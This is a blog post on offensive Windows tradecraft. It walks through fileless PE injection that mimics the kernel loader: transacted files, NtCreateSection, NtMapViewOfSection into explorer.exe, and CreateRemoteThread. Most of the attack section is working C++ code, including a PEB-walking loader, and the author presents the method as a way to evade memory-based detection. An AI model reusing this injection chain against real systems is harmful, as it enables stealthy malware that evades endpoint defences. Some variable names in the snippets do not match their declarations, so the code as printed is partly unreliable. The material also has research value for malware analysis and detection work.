Mimicking the Windows Executable Loader's Memory Allocation
I’m not going to blame procrastination this time, even though this is absolutely what this is. No, this is pure autistic fixation.
Let’s start by saying that a lot of the previous blogs have used a rather lazy technique, and that is “allocating the entire executable image as one piece of memory and marking it as read-write-execute.” If you’re doing anything serious against someone who has better defenses than Windows Defender, this raises red flags. I’m merely a scientist and engineer, not someone who actually works in the field of penetration testing, so I don’t know the reality of the situation as it relates to RWX-allocated pages, but in my experience of malware analysis, I would argue this is a good artifact to flag on, and it’s worth understanding why it’s being employed.
But this fact that they flag on RWX pages has driven me absolutely bonkers. Not that it’s wrong, but what’s the alternative? VirtualAlloc every single section in the PE file in such a way that the allocated pages construct an image? Apparently yes, because using MEM_RESERVE doesn’t let you allocate subsections, but it’s not entirely accurate to what the loader does. And if we need to worry about constructing an image in a similar way to the loader, we need to figure out what the hell is going on. So I opened ntoskrnl.exe in IDA and googled around for kernel resources to figure out how close I could get to the Windows loader.
Abandon VirtualAlloc
You’re not doing it. You’re not going to mimic exactly the way the kernel loads an image because the structures necessary to do it are not exposed by any functions which bridge to userland. So how does it do it? I don’t know jack fuck about Windows kernel internals, but I know my way around IDA and found this paper on what sections are, so let me try and explain what’s going on memory-wise.
NtCreateUserProcess, the kernel function responsible for creating a process, does a ton of stuff before it actually allocates the image. When it does, it calls MmCreateSpecialImageSection, which ultimately triggers the routine which allocates the PE image. (No documentation because it’s an internal kernel function– sorry!) This function calls MiCreateSections, which calls MiCreateImageOrDataSection, which calls MiCreateNewSection, which finally calls MiCreateImageFileMap. All these functions, too, do a ton of stuff, and it’s not even the end of the rabbit hole, but it’s the part of the rabbit hole I’m going to end on. It’s absolutely ridiculous how much boilerplate is in these kernel functions that I just don’t understand because I don’t live in kernel land. Complete skill issue.
So why stop at MiCreateImageFileMap? Because this function is the pivot at which the memory map of our executable is allocated within the kernel process creation call chain, and is where I can start to explain what it’s doing. Referring back to the paper I linked, what this function is doing is allocating the various sections of the executable as designated by the IMAGE_SECTION_HEADER section table within the PE. It can be a little confusing because a section (the PE noun) is different from, but helps create, a section (the kernel object).
One of the things the kernel can do as its lordship and you cannot as a plebeian user is split a kernel section into subsections. It uses the section table as designated by IMAGE_SECTION_HEADER in your PE file to allocate the subsections within the kernel image. You may not be aware, but your executable is mapped into memory as a MEM_IMAGE section, with its various declared sections (PE) being created as subsections (kernel) of the MEM_IMAGE.
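To make the PE side of that distinction concrete, here’s a minimal sketch that walks the section table of a PE file held in a byte buffer and lists each section’s name, virtual address, virtual size and characteristics. It’s plain portable C++ that reads the documented header offsets by hand instead of pulling in windows.h. SectionInfo, read_u16, read_u32 and list_sections are names invented for this illustration, and this only shows the bookkeeping the section table exposes, not what MiCreateImageFileMap actually does with it.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>
#include <string>
#include <vector>

// Hypothetical summary type for this sketch (not a Windows structure).
struct SectionInfo {
    std::string name;
    std::uint32_t virtual_address;
    std::uint32_t virtual_size;
    std::uint32_t characteristics;
};

// Little-endian readers that do not assume alignment or host byte order.
std::uint16_t read_u16(const std::vector<std::uint8_t> &b, std::size_t off) {
    assert(off + 2 <= b.size());
    return static_cast<std::uint16_t>(b[off] | (b[off + 1] << 8));
}

std::uint32_t read_u32(const std::vector<std::uint8_t> &b, std::size_t off) {
    assert(off + 4 <= b.size());
    return static_cast<std::uint32_t>(b[off]) |
           (static_cast<std::uint32_t>(b[off + 1]) << 8) |
           (static_cast<std::uint32_t>(b[off + 2]) << 16) |
           (static_cast<std::uint32_t>(b[off + 3]) << 24);
}

// Returns one entry per IMAGE_SECTION_HEADER, or an empty list if the
// buffer does not look like a PE file.
std::vector<SectionInfo> list_sections(const std::vector<std::uint8_t> &image) {
    std::vector<SectionInfo> out;
    if (image.size() < 0x40 || read_u16(image, 0) != 0x5A4D) return out;  // "MZ"
    const std::size_t nt = read_u32(image, 0x3C);                         // e_lfanew
    if (nt + 24 > image.size() || read_u32(image, nt) != 0x00004550) return out;  // "PE\0\0"

    const std::uint16_t count = read_u16(image, nt + 6);      // NumberOfSections
    const std::uint16_t opt_size = read_u16(image, nt + 20);  // SizeOfOptionalHeader
    std::size_t off = nt + 24 + opt_size;                     // first section header

    for (std::uint16_t i = 0; i < count; ++i, off += 40) {    // each header is 40 bytes
        if (off + 40 > image.size()) break;                   // truncated table
        char name[9] = {0};                                   // names are not always NUL-terminated
        std::memcpy(name, &image[off], 8);
        out.push_back({name,
                       read_u32(image, off + 12),    // VirtualAddress
                       read_u32(image, off + 8),     // VirtualSize
                       read_u32(image, off + 36)});  // Characteristics
    }
    return out;
}
```

Feed it the raw bytes of any executable on disk and you get the list of PE sections, which is the same table the kernel consults when it carves an image section into subsections.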
That may be confusing because I’m having to use the section definitions interchangeably, so let’s see what WinDbg tells us about a section in this post’s code example.
This is the .text section of our example binary. Note the memory type– MEM_IMAGE. This can only be accomplished when an image is loaded by the kernel, whether it be an executable or a DLL. The kernel is royalty, you are merely a plebeian user. This is also why the allocation base is at the image root, which isn’t something you can accomplish with MEM_RESERVE and allocating the addresses individually, because that is not a subsection, which is reserved for the kernel.
Compare this to when you allocate something with VirtualAlloc.
This is from a first attempt to allocate a MEM_IMAGE a la the kernel subsections. Note how the memory type is MEM_PRIVATE and not MEM_IMAGE. There’s no way around it– if we want to mimic the loader, we need to figure out a way to make a MEM_IMAGE.
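If you’d rather check this programmatically than eyeball it in a debugger, the memory type and protection of a region are what VirtualQuery reports in the Type and Protect fields of MEMORY_BASIC_INFORMATION. The sketch below is a portable stand-in for that check: RegionInfo is a hypothetical struct holding just those two fields, the constants carry the Windows SDK values under names of my own, and looks_suspicious is a deliberately crude heuristic (private and executable), not a claim about how any particular product decides.

```cpp
#include <cassert>
#include <cstdint>
#include <string>

// Values of MEM_PRIVATE, MEM_MAPPED and MEM_IMAGE from the Windows SDK,
// redefined under local names so the sketch builds without windows.h.
constexpr std::uint32_t kMemPrivate = 0x20000;
constexpr std::uint32_t kMemMapped = 0x40000;
constexpr std::uint32_t kMemImage = 0x1000000;

// Hypothetical stand-in for the Type and Protect fields of
// MEMORY_BASIC_INFORMATION.
struct RegionInfo {
    std::uint32_t type;
    std::uint32_t protect;
};

std::string region_type_name(std::uint32_t type) {
    switch (type) {
        case kMemPrivate: return "MEM_PRIVATE";
        case kMemMapped:  return "MEM_MAPPED";
        case kMemImage:   return "MEM_IMAGE";
        default:          return "unknown";
    }
}

// The four executable protections (PAGE_EXECUTE through
// PAGE_EXECUTE_WRITECOPY) occupy bits 0x10..0x80; modifiers such as
// PAGE_GUARD live in higher bits and are ignored by the mask.
bool is_executable(std::uint32_t protect) {
    return (protect & 0xF0) != 0;
}

// Crude heuristic for illustration: executable memory that is not backed
// by an image section is worth a second look.
bool looks_suspicious(const RegionInfo &region) {
    return region.type == kMemPrivate && is_executable(region.protect);
}
```

A VirtualAlloc’d RWX blob comes back as MEM_PRIVATE with an executable protection and trips the heuristic; a properly mapped .text section comes back as MEM_IMAGE and does not.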
You may have heard of a technique called process doppelganging, whose section loader we’re going to cop from and detail today to explain how to get a MEM_IMAGE purely in memory. I highly recommend watching the forbidden video (forbidden because YouTube censors it from search) that covers process doppelganging, as this technique in totality will be a nice jumping point for a more advanced reason to allocate an image in this way. Since process doppelganging requires mimicking a complex loading process, we’re simply going to load a MEM_IMAGE and run the main thread in explorer.exe for our example. My autistic fixation is purely on how to load an image properly into memory without touching disk.
All My Homies Hate VirtualAlloc
We know that to mimic the loader we need to somehow create a MEM_IMAGE, which can only be accomplished by the kernel. The kernel function NtCreateSection is exposed to userland, documentation here. It’s the function capable of creating a MEM_IMAGE allocation, but there’s a catch– it requires a file handle. You would think “that’s it, that’s the end of my fileless journey, I give up,” but fret not! In natural Microsoft fashion, there is a deprecated API still used by Microsoft today: the transactional file API.
If you’re familiar with git, the transactional API has sort of similar functionality. To commit a file to disk, you have to call CommitTransaction before any changes are committed. Its opposite, and the function we’ll be taking advantage of, is RollbackTransaction, documented here, which rolls back anything written to any files in the transaction. You will note the transaction handle necessary, which is created by CreateTransaction, documented here. For our purposes, we can take advantage of creating a temporary file which is in the middle of being transacted to load it via NtCreateSection. All we have to do is close the handle to the file we’ve written to and our target executable stays within its temporary transacted state!
Here’s what we need to do to properly load our image purely from memory:
- Acquire the target executable in its disk state
- Create a transaction with CreateTransaction
- Create a file handle to your disk image with CreateFileTransacted, documented here
- Write your disk image to the file and close the write handle; this will at least commit the write to memory but not to disk because of the transacted state
- Create a new handle that’s readable, still with CreateFileTransacted
- Allocate a MEM_IMAGE with NtCreateSection with the readable handle
- Close the readable handle and call RollbackTransaction to flush the disk image from memory and abandon the disk
“Wait,” you’re probably saying, “how do I execute this?” This is only one-half of the puzzle, since you’re working with a section, which doesn’t really become accessible memory until you map it. Now you need to map it into memory with NtMapViewOfSection, documented here. You will note, usefully, this function requires a process handle, meaning we can remotely map our executable into another process. This is primarily where we diverge from traditional process doppelganging for our example purposes. In a traditional process doppelganging attempt, the entire process is reconstructed in userland outside of NtCreateUserProcess. If you don’t need the whole process to be constructed and you just need a shell of a host– like our example here– you can simply map the image into the memory of your target process and CreateRemoteThread on it. Depending on what level of stealth you’re going for– CreateRemoteThread can be a dead giveaway of nefariousness after all– you may not want to do this and would be better off with the kernel slog that is doppelganging.
That’s enough theory, let’s walk through our example code. Let’s start with our injectable payload– a modified version of the sheep monitor payload from a previous post on an injectable style payload. We split our primary functionality of the sheep monitor into two threads– the loader and the main routine. In this configuration, it’s important not to rely on any imports for the loader, since NtMapViewOfSection effectively performs no loading tasks other than relocating the binary; the rest of that loading is normally left up to CreateProcess and NtCreateUserProcess. So we have to load some functions shellcode-style before we get things kicked off.
extern "C" __declspec(dllexport) DWORD WINAPI load_image(SheepConfig *config) {
PPEB_EX peb_ex = ((PPEB_EX)__readgsqword(0x60));
PPEB_LDR_DATA_EX ldr_ex = (PPEB_LDR_DATA_EX)peb_ex->LoaderData;
PLDR_DATA_TABLE_ENTRY_EX list_entry = (PLDR_DATA_TABLE_ENTRY_EX)ldr_ex->InLoadOrderModuleList.Flink;
PLDR_DATA_TABLE_ENTRY_EX ntdll_entry = (PLDR_DATA_TABLE_ENTRY_EX)list_entry->InLoadOrderLinks.Flink;
PLDR_DATA_TABLE_ENTRY_EX kernel32_entry = (PLDR_DATA_TABLE_ENTRY_EX)ntdll_entry->InLoadOrderLinks.Flink;
std::uint8_t * (*get_proc_address_win32)(const std::uint8_t *, const char *) = (std::uint8_t *(*)(const std::uint8_t *, const char *))get_proc_address((std::uint8_t *)kernel32_entry->DllBase, "GetProcAddress");
std::uint8_t * (*load_library)(const char *) = (std::uint8_t * (*)(const char *))get_proc_address_win32((std::uint8_t *)kernel32_entry->DllBase, "LoadLibraryA");
BOOL (*virtual_protect)(LPVOID, SIZE_T, DWORD, PDWORD) = (BOOL (*)(LPVOID, SIZE_T, DWORD, PDWORD))get_proc_address_win32((std::uint8_t *)kernel32_entry->DllBase, "VirtualProtect");
From here, we have everything we need to resume loading the binary within the target process, as per previous posts. You will note how I bootstrapped getting the functions with a half-baked version of GetProcAddress and still used GetProcAddress in the end. This is because I was lazy and didn’t implement import forwarding, which is discussed briefly here. I say this as if I didn’t completely forget about this caveat when writing the half-baked GetProcAddress and run straight into a confusing bug.
Another thing to note: I’m importing VirtualProtect. This diverges greatly from our previous loaders because our image is now properly loaded into memory, meaning all the separate sections have their permissions correctly set, which means there isn’t a guarantee I can write to the import section. So we call VirtualProtect on the section before writing resolved imports to it.
while (import_table->OriginalFirstThunk != 0) {
std::uint8_t *module = load_library((const char *)&base_u8[import_table->Name]);
std::uintptr_t *original_thunks = (std::uintptr_t *)&base_u8[import_table->OriginalFirstThunk];
std::uintptr_t *import_addrs = (std::uintptr_t *)&base_u8[import_table->FirstThunk];
std::uintptr_t *old_base = import_addrs;
DWORD old_protect;
DWORD new_protect = PAGE_READWRITE;
virtual_protect(import_addrs, 1024, new_protect, &old_protect);
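To see why that write can fail without the protection change, it helps to look at how section characteristics translate into page protections. The sketch below is an approximation under stated assumptions, not the kernel’s actual logic: it maps the IMAGE_SCN_MEM_* bits of a section header to the PAGE_* protection I would expect an image view to report, assuming writable image pages show up as copy-on-write. The constants carry the Windows SDK values under local names, and image_section_protection and needs_unprotect_before_write are hypothetical helpers made up for this illustration.

```cpp
#include <cassert>
#include <cstdint>

// Section characteristic bits (IMAGE_SCN_MEM_EXECUTE/READ/WRITE).
constexpr std::uint32_t kScnMemExecute = 0x20000000;
constexpr std::uint32_t kScnMemRead = 0x40000000;
constexpr std::uint32_t kScnMemWrite = 0x80000000;

// Page protection values (PAGE_NOACCESS ... PAGE_EXECUTE_WRITECOPY).
constexpr std::uint32_t kPageNoAccess = 0x01;
constexpr std::uint32_t kPageReadOnly = 0x02;
constexpr std::uint32_t kPageReadWrite = 0x04;
constexpr std::uint32_t kPageWriteCopy = 0x08;
constexpr std::uint32_t kPageExecute = 0x10;
constexpr std::uint32_t kPageExecuteRead = 0x20;
constexpr std::uint32_t kPageExecuteReadWrite = 0x40;
constexpr std::uint32_t kPageExecuteWriteCopy = 0x80;

// Assumption: writable image sections are reported as copy-on-write
// until they are first written to.
std::uint32_t image_section_protection(std::uint32_t characteristics) {
    const bool x = (characteristics & kScnMemExecute) != 0;
    const bool r = (characteristics & kScnMemRead) != 0;
    const bool w = (characteristics & kScnMemWrite) != 0;
    if (x) {
        if (w) return kPageExecuteWriteCopy;
        if (r) return kPageExecuteRead;
        return kPageExecute;
    }
    if (w) return kPageWriteCopy;
    if (r) return kPageReadOnly;
    return kPageNoAccess;
}

// True when a plain store to the page would fault, so the protection has
// to be changed before patching.
bool needs_unprotect_before_write(std::uint32_t protect) {
    return protect != kPageReadWrite && protect != kPageWriteCopy &&
           protect != kPageExecuteReadWrite && protect != kPageExecuteWriteCopy;
}
```

With many toolchains the import address table ends up in a read-only data section, which under this mapping comes out as PAGE_READONLY, hence the VirtualProtect call before the thunks are patched.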
One final thing to note. To more easily acquire the loader function pointer, since we’re not inside the target image at prep time, we made it an export and manually acquired the function RVA for use with CreateRemoteThread.
With our payload prepared and added to our buildchain with the magic of CMake, we’re ready to inject our Sheep Monitor variant into explorer.exe.
As per the previous post we enumerate for running processes and filter for explorer.exe. When we find it, we open it with the same proper privileges we would for standard allocation with VirtualAllocEx. See process access rights for more details on what the permissions do. You primarily need PROCESS_VM_OPERATION and PROCESS_CREATE_THREAD rights.
/* open pid with PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE */
HANDLE explorer_proc = OpenProcess(PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, found_pid);
assert(explorer_proc != NULL);
Now the juicy part– mapping our payload. We start by creating a transaction and creating a transacted file, then writing our payload to it.
/* create a new transaction */
HANDLE transaction = CreateTransaction(NULL, NULL, 0, 0, 0, 0, NULL);
assert(transaction != INVALID_HANDLE_VALUE);
/* create a dummy temp file to write to (it won't be written to disk) */
char dummy_name[MAX_PATH+1];
memset(dummy_name, 0, sizeof(dummy_name));
char temp_path[MAX_PATH+1];
memset(temp_path, 0, sizeof(temp_path));
DWORD temp_path_size = GetTempPathA(MAX_PATH, temp_path);
GetTempFileNameA(temp_path, "TH", 0, dummy_name);
HANDLE sheep_monitor_file = CreateFileTransactedA(dummy_name,
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL,
transaction,
NULL,
NULL);
assert(sheep_monitor_file != INVALID_HANDLE_VALUE);
DWORD bytes_written;
assert(WriteFile(sheep_monitor_file, &SHEEP_MONITOR[0], SHEEP_MONITOR_SIZE, &bytes_written, NULL));
CloseHandle(sheep_monitor_file);
Now the payload is written to a transacted file, which can be used in NtCreateSection. In this state it is not on the disk, it exists purely in the memory of the loading executable! We then create a new transacted file handle for reading and create our image section with the transacted file. We finally roll back our transaction and wipe the disk image from memory. The result is that the file never touches the disk and yet is loaded in as a MEM_IMAGE!
/* read the transacted file into a section */
sheep_monitor_file = CreateFileTransactedA(dummy_name,
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL,
transaction,
NULL,
NULL);
assert(sheep_monitor_file != INVALID_HANDLE_VALUE);
HANDLE sheep_section;
assert(NtCreateSection(&sheep_section,
SECTION_QUERY | SECTION_MAP_READ | SECTION_MAP_EXECUTE,
NULL,
0,
PAGE_READONLY,
SEC_IMAGE,
sheep_monitor_file) == STATUS_SUCCESS);
/* *jedi hands* there was never a file */
CloseHandle(sheep_monitor_file);
assert(RollbackTransaction(transaction));
The final spice on this malware souffle is NtMapViewOfSection. We provide our target handle to the function and acquire its remote base address for later remote processing.
PVOID base_address = 0;
SIZE_T size = 0;
DWORD ntstatus = NtMapViewOfSection(sheep_section,
target_proc,
&base_address,
0,
0,
NULL,
&size,
ViewShare,
MEM_DIFFERENT_IMAGE_BASE_OK,
PAGE_EXECUTE_WRITECOPY);
assert(ntstatus == STATUS_SUCCESS || ntstatus == STATUS_IMAGE_AT_DIFFERENT_BASE);
Armed with our remote base address, we can now call our loader function with its respective config and its main routine!
SheepConfig config;
memset(&config, 0, sizeof(SheepConfig));
config.image_base = (uintptr_t)remote_sheep_base;
config.max_sheep = 10;
uintptr_t config_base = (uintptr_t)VirtualAllocEx(explorer_proc, NULL, sizeof(SheepConfig), MEM_COMMIT, PAGE_READWRITE);
SIZE_T bytes_written;
assert(config_base != 0);
assert(WriteProcessMemory(explorer_proc, (LPVOID)config_base, &config, sizeof(SheepConfig), &bytes_written));
DWORD loader_rva = get_export_rva(&SHEEP_MONITOR[0], "load_image");
DWORD loader_id;
HANDLE remote_thread_handle = CreateRemoteThread(explorer_proc,
NULL,
8192,
(LPTHREAD_START_ROUTINE)(remote_sheep_base+loader_rva),
(LPVOID)config_base,
0,
&loader_id);
assert(remote_thread_handle != NULL);
DWORD main_id;
HANDLE main_handle = CreateRemoteThread(explorer_proc,
NULL,
8192,
(LPTHREAD_START_ROUTINE)(remote_sheep_base+sheep_nt->OptionalHeader.AddressOfEntryPoint),
NULL,
0,
&main_id);
assert(main_handle != NULL);
Et voila, you’ve successfully injected an image with a proper memory allocation into a target process without touching disk! I hope you’ve enjoyed learning about this process.